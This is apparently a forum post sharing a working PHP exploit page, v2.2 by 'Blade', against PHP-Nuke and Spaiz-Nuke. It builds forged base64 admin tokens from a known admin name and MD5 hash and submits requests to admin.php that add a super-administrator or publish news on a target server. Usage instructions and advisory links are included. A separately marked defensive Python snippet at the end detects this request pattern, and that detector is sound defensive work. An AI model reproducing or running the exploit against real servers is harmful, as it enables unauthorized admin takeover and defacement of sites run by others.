`Hello, here is my exploit for PHP-Nuke >= v6.5 & Spaiz-Nuke SQL > v1.2 SQL
Injection.
Code in PHP:
Greetings, Blade...
<?php
/* PHP-Nuke & Spaiz-Nuke SQL Injection Exploit v2.2
By Blade
<[email protected]>
|Blade «[email protected]»|
****www.abez.org Of AbeZ
***www.rzw.com.ar By XyborG
**www.adictosnet.com.ar By LaKosa
*www.fihezine.tsx.to Of FiH eZine
*/
echo'<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01
Transitional//EN"><html><head>
<title>PHP-Nuke And Spaiz-Nuke Injection Exploit v2.2 By
Blade</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><STYLE type=text/css>
.bginput { FONT-SIZE: 9px; COLOR: #000000; FONT-FAMILY:
Verdana,Arial,Helvetica,sans-serif }
A:link { COLOR: #000066; TEXT-DECORATION: none }
A:visited { COLOR: #000066; TEXT-DECORATION: none }
A:active { COLOR: #000066; TEXT-DECORATION: none }
A:hover { COLOR: #000066; TEXT-DECORATION: none }
.button { FONT-SIZE: 10px; COLOR: #000000; FONT-FAMILY:
Verdana,Arial,Helvetica,sans-serif }
</STYLE></head><body bgcolor="#FDFEFF" text="#000000" link="#363636"
vlink="#363636" alink="#d5ae83">
<!-- PHP-Nuke & Spaiz-Nuke SQL Injection Exploit v2.2 - Original Code
By Blade<[email protected]> -->';
if (($action == "goAdmin") and ($server) and ($add_name) and ($add_email)
and ($add_aid) and ($add_pwd)){
$admin_name = chop($admin_name); $admin_hash = chop($admin_hash);
$server = chop($server); $add_pwd = chop($add_pwd);
$hash = $admin_name . ":" . $admin_hash . ":";
$hash = base64_encode($hash);
echo "<form name='add' method='post' action='http://" . $server .
"/admin.php'>
<input type='hidden' name='op' value='AddAuthor'>
<input type='hidden' name='add_name' value='" . $add_name . "'>
<input type='hidden' name='add_aid' value='" . $add_aid . "'>
<input type='hidden' name='add_email' value='" . $add_email . "'>
<input type='hidden' name='add_url' value='" . $add_url . "'>
<input type='hidden' name='add_pwd' value='" . $add_pwd . "'>
<input type='hidden' name='add_radminsuper' value='" .
$add_radminsuper . "'>
<input type='hidden' name='admin' value=" . $hash .">
<center><font size='1' face='Verdana, Arial, Helvetica, sans-serif'>Servidor
vulnerable : <strong>http://" . $server . "</strong> . <br>Clave
Hash : <strong>" .
$hash . "</strong> . <br>Nuevo Administrador : <strong>" . $add_name
. "</strong>.
En caso de que estos datos no sean correctos vuelva atras desde
<a href='javascript:history.back()
'><strong>«Aquí»</strong></a>.</font>
<br><br><font size='1' face='Verdana, Arial, Helvetica, sans-serif'><b>Si son correctos
continue la operacion agregando el nuevo
Administrador.</b></font></center>
<center><input name='AddSysop' type='submit' id='AddSysop'
value='Agregar Administrador' class='button'></center>
</form>";
} elseif (($action == "goNews") and ($server) and ($subject) and
($hometext) and ($bodytext)){
$admin_name = chop($admin_name); $admin_hash = chop($admin_hash);
$server = chop($server); $add_pwd = chop($add_pwd);
$hash = $admin_name . ":" . $admin_hash . ":";
$hash = base64_encode($hash);
echo "<form name='addNews' method='post' action='http://" . $server
. "/admin.php'>
<input name='op' type='hidden' id='op' value='PostAdminStory'>
<input name='topic' type='hidden' id='topic' value='1'>
<input name='catid' type='hidden' id='catid' value='0'>
<input name='ihome' type='hidden' id='ihome' value='0'>
<input type='hidden' name='subject' value='" . $subject . "'>
<input type='hidden' name='hometext' value='" . $hometext . "'>
<input type='hidden' name='bodytext' value='" . $bodytext . "'>
<input type='hidden' name='acomm' value='" . $acomm . "'>
<input type='hidden' name='automated' value='" . $automated . "'>
<input type='hidden' name='day' value='" . $day . "'>
<input type='hidden' name='month' value='" . $month . "'>
<input type='hidden' name='year' value='" . $year . "'>
<input type='hidden' name='hour' value='" . $hour . "'>
<input type='hidden' name='min' value='" . $min . "'>
<input type='hidden' name='admin' value=" . $hash .">
<center>
<font size='1' face='Verdana, Arial, Helvetica, sans-serif'>Servidor
vulnerable : <strong>http://" . $server . "</strong> . <br>
Clave Hash : <strong>" . $hash . "</strong> . <br>
Asunto de la Noticia: <strong>" . $subject . "</strong>. <br>
La Noticia es: <strong>" . $hometext . "</strong>. <br>
En caso de que estos datos no sean correctos vuelva atras desde <a
href='javascript:history.back()'><strong>«Aquí»</strong></a>.</font> <br>
<br>
<font size='1' face='Verdana, Arial, Helvetica, sans-serif'><b>Si
son correctos continue la operacion agregando la noticia.</b></font>
</center>
<center>
<input name='AddSysop' type='submit' id='AddSysop' value='Agregar
Noticia' class='button'>
</center>
</form>";
} elseif($exploit == "news") {
echo'<FORM action="' . $PHP_Self . '" method=post>
<TABLE width="50%" border=0 align="center" cellPadding=0
cellSpacing=0>
<TR><TD colspan="3"><div align="center"><strong><font color="#003366"
size="1" face="Verdana, Arial, Helvetica, sans-serif"><u>Server
Vulnerable:</u></font></strong></div></TD>
</TR>
<TR> <TD width="39%"> <div align="center"><font size="1"
face="Verdana, Arial, Helvetica, sans-serif"><strong>Server
Adress:</strong></font></div></TD>
<TD width="13%"><div align="right"><font size="1" face="Verdana,
Arial, Helvetica, sans-serif">http://</font></div></TD>
<TD width="48%"><div align="left"><font size="1" face="Verdana,
Arial, Helvetica, sans-serif">
</font>
<input name="server" type="text" class="bginput" id="server"
value="www.">
</div></TD>
</TR>
<TR> <TD> <div align="center"><strong><font size="1" face="Verdana,
Arial, Helvetica, sans-serif">Admin
Name:</font></strong></div></TD>
<TD> </TD>
<TD> <p align="left"> <input name="admin_name" type="text"
id="admin_name" class="bginput">
</p></TD>
</TR>
<TR> <TD><div align="center"><strong><font size="1" face="Verdana,
Arial, Helvetica, sans-serif">Password MD5:</font></strong></div></TD>
<TD> </TD>
<TD> <p align="left">
<input name="admin_hash" type="text" id="admin_hash" size="40"
class="bginput">
</p></TD>
</TR>
</TABLE><br>
<table width="50%" border="0" align="center">
<tr>
<td><div align="center"><strong><font color="#003366" size="1"
face="Verdana, Arial, Helvetica, sans-serif"><u>The
News:</u></font></strong></div></td>
</tr>
<tr> <td><div align="center"><strong><font size="1" face="Verdana,
Arial, Helvetica, sans-serif">
<input name="action" type="hidden" id="action" value="goNews">
Title</font></strong><font size="1" face="Verdana, Arial, Helvetica,
sans-serif">(Obligatory)<strong>:<br>
<input size=50 name=subject class="bginput">
</strong></font></div></td>
</tr>
<tr> <td><div align="center"><font size="1" face="Verdana, Arial,
Helvetica, sans-serif"><strong>Text of
the News</strong>(Obligatory)<strong>:<br>
<textarea name=hometext rows=5 wrap=virtual cols=50
class="bginput"></textarea>
</strong></font></div></td>
</tr>
<tr> <td><div align="center"><font size="1" face="Verdana, Arial,
Helvetica, sans-serif"><strong>Extended
Text</strong>(Obligatory)<strong>:<br>
<textarea name=bodytext rows=12 wrap=virtual cols=50
class="bginput"></textarea>
</strong></font></div></td>
</tr>
<tr> <td><div align="center"><font size="1" face="Verdana, Arial,
Helvetica, sans-serif">Active Commentaries for
this News?<strong>
<input type=radio checked value=0 name=acomm>
Yes
<input type=radio value=1 name=acomm>
No</strong><strong></strong></font></div></td>
</tr>
<tr> <td><div align="center"><font size="1" face="Verdana, Arial,
Helvetica, sans-serif">You want to program
this history?<strong>
<input type=radio value=1 name=automated>
Yes
<input type=radio checked value=0 name=automated>
No<br>
<br>
Day:
<input name="day" type="text" id="day3" value="' . date("d") . '"
size="4" class="bginput">
Month:
<select name="month" id="select2" class="bginput">
<option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
<option value="4">4</option>
<option value="5">5</option>
<option value="6">6</option>
<option value="7">7</option>
<option value="8">8</option>
<option value="9">9</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12" selected>12</option>
</select>
Year:
<input maxlength=4 size=5 value="' . date("Y") . '" name=year
class="bginput">
<br>
Hour:
<select name=hour class="bginput">
<option selected name="hour">00</option>
<option name="hour">01</option>
<option name="hour">02</option>
<option name="hour">03</option>
<option name="hour">04</option>
<option name="hour">05</option>
<option name="hour">06</option>
<option name="hour">07</option>
<option name="hour">08</option>
<option name="hour">09</option>
<option name="hour">10</option>
<option name="hour">11</option>
<option name="hour">12</option>
<option name="hour">13</option>
<option name="hour">14</option>
<option name="hour">15</option>
<option name="hour">16</option>
<option name="hour">17</option>
<option name="hour">18</option>
<option name="hour">19</option>
<option name="hour">20</option>
<option name="hour">21</option>
<option name="hour">22</option>
<option name="hour">23</option>
</select>
: <select name=min class="bginput">
<option selected name="min">00</option>
<option name="min">05</option>
<option name="min">10</option>
<option name="min">15</option>
<option name="min">20</option>
<option name="min">25</option>
<option name="min">30</option>
<option name="min">35</option>
<option name="min">40</option>
<option name="min">45</option>
<option name="min">50</option>
<option name="min">55</option>
</select>
: 00</strong></font></div></td>
</tr>
<tr> <td><div align="center"><font size="1" face="Verdana, Arial,
Helvetica, sans-serif"><strong> <input name="submit" type=submit value="Add
News" class="button">
</strong></font></div></td>
</tr>
</table><center><strong><font color="#000066" size="1"
face="Tahoma"><a href="' . $PHP_Self . '?exploit=admin">[ View exploit of
the Administrators ]</a> </font></strong></center>';
} else {
echo'<FORM action="' . $PHP_Self . '" method=post>
<p align="center"><u><strong><font size="2" face="Verdana, Arial,
Helvetica, sans-serif">
<input name="action" type="hidden" id="action" value="goAdmin">
</font></strong></u></p>
<div align="center">
<TABLE width="50%" border=0 align="center" cellPadding=0
cellSpacing=0>
<TR><TD colspan="3"><div align="center"><strong><font color="#003366"
size="1" face="Verdana, Arial, Helvetica, sans-serif"><u>Server
Vulnerable:</u></font></strong></div></TD>
</TR>
<TR> <TD width="39%"> <div align="center"><font size="1"
face="Verdana, Arial, Helvetica, sans-serif"><strong>Server
Adress:</strong></font></div></TD>
<TD width="13%"><div align="right"><font size="1" face="Verdana,
Arial, Helvetica, sans-serif">http://</font></div></TD>
<TD width="48%"><div align="left"><font size="1" face="Verdana,
Arial, Helvetica, sans-serif">
</font>
<input name="server" type="text" class="bginput" id="server"
value="www.">
</div></TD>
</TR>
<TR> <TD> <div align="center"><strong><font size="1" face="Verdana,
Arial, Helvetica, sans-serif">Admin
Name:</font></strong></div></TD>
<TD> </TD>
<TD> <p align="left">
<input name="admin_name" type="text" id="admin_name" class="bginput">
</p></TD>
</TR>
<TR> <TD><div align="center"><strong><font size="1" face="Verdana,
Arial, Helvetica, sans-serif">Password MD5:</font></strong></div></TD>
<TD> </TD>
<TD> <p align="left">
<input name="admin_hash" type="text" id="admin_hash" size="40"
class="bginput">
</p></TD>
</TR>
</TABLE>
<br>
</div>
<TABLE width="50%" border=0 align="center">
<TBODY>
<TR> <TD colspan="2"><div align="center"><strong><font
color="#003366" size="1" face="Verdana, Arial, Helvetica, sans-serif"><u>Account
Data:</u></font></strong></div></TD>
</TR>
<TR> <TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>Name:</strong></font></TD>
<TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">
<INPUT maxLength=50 size=30 name=add_name class="bginput">
(Obligatory)</font></TD>
</TR>
<TR> <TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>Nickname:</strong></font></TD>
<TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">
<INPUT maxLength=30 size=30 name=add_aid class="bginput">
(Obligatory)</font></TD>
</TR>
<TR> <TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>E-Mail:</strong></font></TD>
<TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">
<INPUT maxLength=60 size=30 name=add_email class="bginput">
(Obligatory)</font></TD>
</TR>
<TR> <TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">URL:</font></TD>
<TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">
<INPUT name=add_url class="bginput" value="http://www." size=30
maxLength=60>
<strong> <input name="add_radminsuper" type="hidden"
id="add_radminsuper" value="1">
</strong> </font></TD>
</TR>
<TR> <TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>Password:</strong></font></TD>
<TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">
<INPUT type=password maxLength=12 size=12 name=add_pwd class="bginput">
(Obligatory)</font></TD>
</TR>
<INPUT type=hidden value=AddAuthor name=op>
</TABLE> <div align="center">
<INPUT name="submit" type=submit value="Create Administrator"
class="button">
</div>
</FORM><center><strong><font color="#000066" size="1"
face="Tahoma"><a href="' . $PHP_Self . '?exploit=news">[ View exploit of
News ]</a> </font></strong></center>';
} if (($action == "goAdmin") or ($action == "goNews")){
echo'';
}if (($action != "goAdmin") and ($action != "goNews")){
echo'<br><table width="100%" border="0" align="center">
<tr> <td colspan="2"><div align="center"><font color="#003366"
size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong><u>Usage:</u></strong></font></div></td>
</tr>
<tr> <td width="15%"><strong><font size="1"
face="Tahoma">»Server Adress
:</font></strong></td>
<td width="85%"><font size="1" face="Tahoma">It is the URL
corresponding to the
vulnerable Vestibule in PHP-Nuke. Example:
www.phpnuke.org.</font></td>
</tr>
<tr> <td><strong><font size="1" face="Tahoma">»Nombre Admin
:</font></strong></td>
<td><font size="1" face="Tahoma">It is the identity in value of name,
of the administrator who password is known enciphered. Example :
xMan.</font></td>
</tr>
<tr> <td><strong><font size="1" face="Tahoma">»Password MD5
:</font></strong></td>
<td><font size="1" face="Tahoma">He is password enciphered in MD5 of
the administrator,
whose name is known. Example: 1ea52f26e7e0ce08e462f87f5e35096c
</font></td>
</tr>
</table><br><div align="center">
<table width="45%" border="0" align="center">
<tr> <td colspan="2"><div align="center"><font color="#003366"
size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong><u>References:</u></strong></font></div></td>
</tr>
<tr> <td width="47%"><div align="center"><font size="1"
face="Tahoma">Discoverers
Bug :</font></div></td>
<td width="53%"><div align="center"><font size="1" face="Tahoma"><a
href="http://rst.void.ru/texts/advisory10.htm"
target="_blank">http://www.rst.void.ru</a> </font> <font size="1"
face="Tahoma"></font></div></td>
</tr>
<tr> <td><div align="center"><font size="1"
face="Tahoma"><strong>More Information</strong>
:</font></div></td>
<td><div align="center"><strong><font size="1" face="Tahoma"><a
href="http://www.rzw.com.ar/article895.html"
target="_blank"><u>http://www.rzw.com.ar</u></a></font></strong></div></td>
</tr>
<tr> <td><div align="center"><font size="1" face="Tahoma">More
Information :</font></div></td>
<td><div align="center"><font size="1" face="Tahoma"><a
href="http://www.security.nnov.ru/search/document.asp?docid=5201"
target="_blank">http://www.security.nnov.ru</a></font></div></td>
</tr>
<tr> <td>
<div align="center"><font size="1" face="Tahoma">More Information
:</font></div></td>
<td><div align="center"><font size="1" face="Tahoma"><a
href="http://www.cyruxnet.com.ar/phpnuke_modules.htm"
target="_blank">http://www.cyruxnet.com.ar</a></font></div></td>
</tr>
</table>';
}
echo'<center><p><a href="mailto:[email protected]"><u><strong><font
color="#CC0000" size="1" face="Tahoma">Original Exploit Code By
Blade.</font></strong></u></a><br><font color="#003366" size="1"
face="Verdana"><b>Version 2.2.</b></font></p></center>
</div>
</body>
</html>';
?>
`
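A defender-side check for the request shape this script produces, added here as an example and not part of the original post: it flags requests to `admin.php` where the `admin` value (base64 of `name:md5:`) arrives as a form or query parameter. The request-record fields (`path`, `query`, `body`, `cookie`) are hypothetical, the sample traffic is constructed, and the check assumes a normal admin session carries this token in a cookie rather than in the body.

```python
import base64
import re
from urllib.parse import parse_qs, urlencode

# Layout built by the script above: base64("<admin name>:<32-hex MD5>:")
TOKEN_RE = re.compile(r"^[^:]+:[0-9a-fA-F]{32}:")
# op values the script submits to admin.php
PRIVILEGED_OPS = {"AddAuthor", "PostAdminStory"}


def looks_like_admin_token(value):
    """True if value base64-decodes to '<name>:<md5 hex>:'."""
    try:
        padded = value + "=" * (-len(value) % 4)
        decoded = base64.b64decode(padded, validate=True).decode("latin-1")
    except ValueError:  # binascii.Error is a ValueError subclass
        return False
    return bool(TOKEN_RE.match(decoded))


def flag_request(req):
    """Return (source, op) findings for one request record.

    A finding means the admin token arrived as a form or query
    parameter on admin.php instead of in the Cookie header
    (assumption: legitimate sessions use the cookie).
    """
    if not req["path"].endswith("/admin.php"):
        return []
    query = parse_qs(req.get("query", ""))
    body = parse_qs(req.get("body", ""))
    ops = set(query.get("op", []) + body.get("op", []))
    op = next(iter(sorted(ops & PRIVILEGED_OPS)), None)
    findings = []
    for source, params in (("query", query), ("body", body)):
        if any(looks_like_admin_token(v) for v in params.get("admin", [])):
            findings.append((source, op))
    return findings


# Constructed sample traffic (name and hash are made up).
TOKEN = base64.b64encode(b"exampleadmin:" + b"0123456789abcdef" * 2 + b":").decode()
SAMPLES = [
    # Normal admin use: token travels in the cookie, not the body.
    {"path": "/admin.php", "cookie": "admin=" + TOKEN, "body": "op=PostAdminStory&subject=hi"},
    # Shape produced by the form above: token and op both in the POST body.
    {"path": "/admin.php", "body": urlencode({"op": "AddAuthor", "add_aid": "x", "admin": TOKEN})},
    # Same parameter name but not a token, then a different script.
    {"path": "/admin.php", "body": "admin=hello"},
    {"path": "/modules.php", "query": urlencode({"admin": TOKEN})},
]

if __name__ == "__main__":
    for i, req in enumerate(SAMPLES):
        print(i, flag_request(req))
```

Only the second sample is flagged; the fix on the application side is to read the token from the cookie only and not from request parameters.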